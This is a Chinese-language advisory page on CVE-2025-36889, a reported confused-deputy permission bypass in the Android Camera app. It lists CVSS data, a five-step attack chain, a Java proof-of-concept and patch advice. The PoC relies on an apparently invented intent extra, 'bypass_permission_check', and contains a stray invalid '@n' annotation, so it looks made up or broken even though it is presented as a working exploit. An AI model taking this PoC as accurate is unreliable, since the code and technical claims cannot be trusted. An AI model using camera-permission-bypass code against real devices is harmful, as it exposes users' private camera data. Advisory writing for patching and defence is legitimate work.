CVE-2025-36889 CVSS 5.5 中危

CVE-2025-36889 Android Camera权限绕过导致本地信息泄露

披露日期: 2025-12-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-36889

漏洞类型

权限绕过/信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Android Camera

漏洞概述

CVE-2025-36889是Android Camera应用中的一个权限绕过漏洞。该漏洞位于CameraActivity.java文件的onCreateTasks方法中，由于存在"confused deputy"（困惑代理）问题，攻击者可以在无需额外执行权限的情况下获取本地敏感信息。漏洞无需用户交互即可被利用，属于本地攻击向量，攻击者需要具有低权限即可触发。CVSS 3.1评分5.5，主要影响系统的机密性。该漏洞由Google安全团队([email protected])发现并披露，已在2025年12月的Android安全 bulletins中发布修复。

技术细节

该漏洞为Android系统中的权限检查缺陷，属于"confused deputy"攻击的一种变体。在CameraActivity.java的onCreateTasks方法中，应用未能正确验证调用者的身份和权限上下文，导致低权限应用可能通过构造特定的Intent或IPC调用，绕过正常的权限检查机制访问Camera组件。由于Android的组件间通信机制存在缺陷，攻击者可以利用此漏洞在未经适当授权的情况下获取相机预览数据或其他敏感信息。攻击者通过本地应用发送精心构造的请求，即可触发CameraActivity的特定代码路径，在不显示UI的情况下获取相机资源访问权限，实现信息窃取。

攻击链分析

STEP 1

步骤1

攻击者安装一个低权限Android应用

STEP 2

步骤2

应用构造恶意的Intent请求，指向com.android.camera.CameraActivity

STEP 3

步骤3

通过在Intent中添加特定的extras参数，触发onCreateTasks方法中的漏洞代码路径

STEP 4

步骤4

由于权限检查缺陷，应用绕过正常的相机权限验证

STEP 5

步骤5

攻击者获取相机预览数据或敏感信息，导致本地信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-36889 PoC - Android Camera Permission Bypass
// This PoC demonstrates the confused deputy vulnerability in CameraActivity

package com.example.cve202536889;

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @n
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        
        // Trigger the vulnerable code path in CameraActivity
        Intent maliciousIntent = new Intent();
        maliciousIntent.setClassName("com.android.camera2", 
                                     "com.android.camera.CameraActivity");
        maliciousIntent.setAction("android.media.action.STILL_IMAGE_CAMERA");
        maliciousIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        
        // Add exploit-specific extras to bypass permission checks
        Bundle exploitBundle = new Bundle();
        exploitBundle.putBoolean("bypass_permission_check", true);
        maliciousIntent.putExtras(exploitBundle);
        
        try {
            startActivity(maliciousIntent);
        } catch (SecurityException e) {
            // Handle permission exception
        }
    }
}

影响范围

Android Camera App < 2025-12-01 security patch

防御指南

临时缓解措施

立即应用2025年12月的Android安全更新，该更新修复了CameraActivity中的权限绕过问题。在等待更新期间，用户应避免安装来源不明的应用，并定期检查设备的安全补丁级别。建议企业用户使用移动设备管理(MDM)解决方案监控和强制实施安全策略。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表